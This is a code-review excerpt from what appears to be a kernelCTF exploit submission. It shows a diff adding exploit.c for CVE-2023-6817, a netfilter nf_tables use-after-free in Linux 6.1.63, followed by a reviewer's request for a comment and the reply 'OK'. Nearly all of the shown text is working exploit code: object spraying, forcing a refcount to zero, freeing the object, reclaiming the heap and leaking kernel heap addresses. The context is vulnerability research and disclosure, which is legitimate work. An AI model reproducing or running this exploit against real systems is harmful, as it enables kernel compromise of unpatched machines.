pocs/linux/kernelctf/CVE-2023-6817_lts_cos/exploit/lts-6.1.63/exploit.c

```diff
@@ -0,0 +1,485 @@
+    char *table = "table for leak";
+    new_table(socket, table);
+    new_obj_ct_expect(socket, table, obj_for_leak, NULL, 0);
+    
+    new_set_pipapo(socket,table, pipapo_set, 0x40, NFT_OBJECT_CT_EXPECT);
+    new_set_hashtable_with_map(socket, table, hash_set, 8);
+    new_set_hashtable(socket, table, hash_set_2, NFT_OBJECT_CT_EXPECT, 8);
+    char *key = malloc(0x40);
+    char *key_end = malloc(0x40);
+    uint64_t hash_key;
+    
+    
+    nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+    
+    //step 1
+    //spray some objects
+    char *pad = malloc(0x100);
+    memset(pad,0x41,0x100);
+    char *obj_name = malloc(0x40);
+    memset(obj_name,0,0x40);
+    
+    for(i=0;i<0x40;i++){
+        snprintf(obj_name,0x40,"obj_for_leak_%d",i);
+        new_obj_ct_expect(socket, table, obj_name, NULL, 0);
+    }
+    
+    //step 2
+    //make target_obj->use = 0xa5
+    
+    for(i=0;i<0xa4;i++){
+    	memset(key,i,0x40);
+        memset(key_end,i,0x40);
+        new_setelem(socket, table, pipapo_set, pad, 0x100, target_obj, key, 0x40, key_end, 0x40, 0);
+    }
+    hash_key = 0xdeadbeef;
+    new_setelem(socket, table, hash_set_2, pad, 0x100, target_obj, &hash_key, 8, NULL, 0, 0);
+    //step 3
+    //make target_obj->use = 0
+    for(i=0;i<0xa5;i++){
+    	primitive_0(socket, table, target_obj);
+    }
+    
+    sleep(2);
+    
+    //step 4
+    //delete target obj
+    del_obj(socket, table, target_obj, NFT_OBJECT_CT_EXPECT);
+    sleep(2);
+    
+    //step 5
+    //get heap back
+    for(i=0;i<0x1000;i++){
+        //printf("%d\n",i);
+        *(uint64_t *)pad = i;
+        hash_key = i;
+        new_setelem_with_elemdata(socket, table, hash_set, pad, 0xa1, &hash_key, 8, NULL, 0,0);
+    }
+    
+    //step 6
+    //make setelem->udata_len = 0xfc
+    elem_flush(socket, table, pipapo_set);
+    sleep(2);
+    
+    //step 7 Get leak data
+    struct nl_sock * socket2 = nl_socket_alloc();
+    if(nfnl_connect(socket2)<0){
+        printf("nfnl_connect fail!\n");
+        return 0;
+    }
+    nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+    for(i=0;i<0x1000;i++){
+        hash_key = i;
+        get_setelem(socket2, table, hash_set, &hash_key, 8);
+        nl_recvmsgs_default(socket2);
+        nl_recvmsgs_default(socket2);
+    }
+    uint64_t obj_a = *(uint64_t *)&leak_data[0xcb];
+    uint64_t obj_b = *(uint64_t *)&leak_data[0xcb+8];
+    printf("leak obj A heap : %llx\n",obj_a);
+    printf("leak obj B heap : %llx\n",obj_b);
+    
+    elem_flush(socket, table, hash_set);
+    sleep(2);
+    
+    *(uint64_t *)&pad[0x20] = obj_a + 0x80 + 1; //because address of nft_ct_expect_obj_ops is ffffffff82b29000
+    spray_tables(socket,0x400, pad, 0xcc);
+    printf("spray finish\n");
+    hash_key = 0xdeadbeef;
+    nl_socket_modify_cb(socket2,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_leak_ops, NULL);
```

Comment:
Same as above, please add a comment that explains that this will run a callback, when the callback runs, and what it does.

Reply:
OK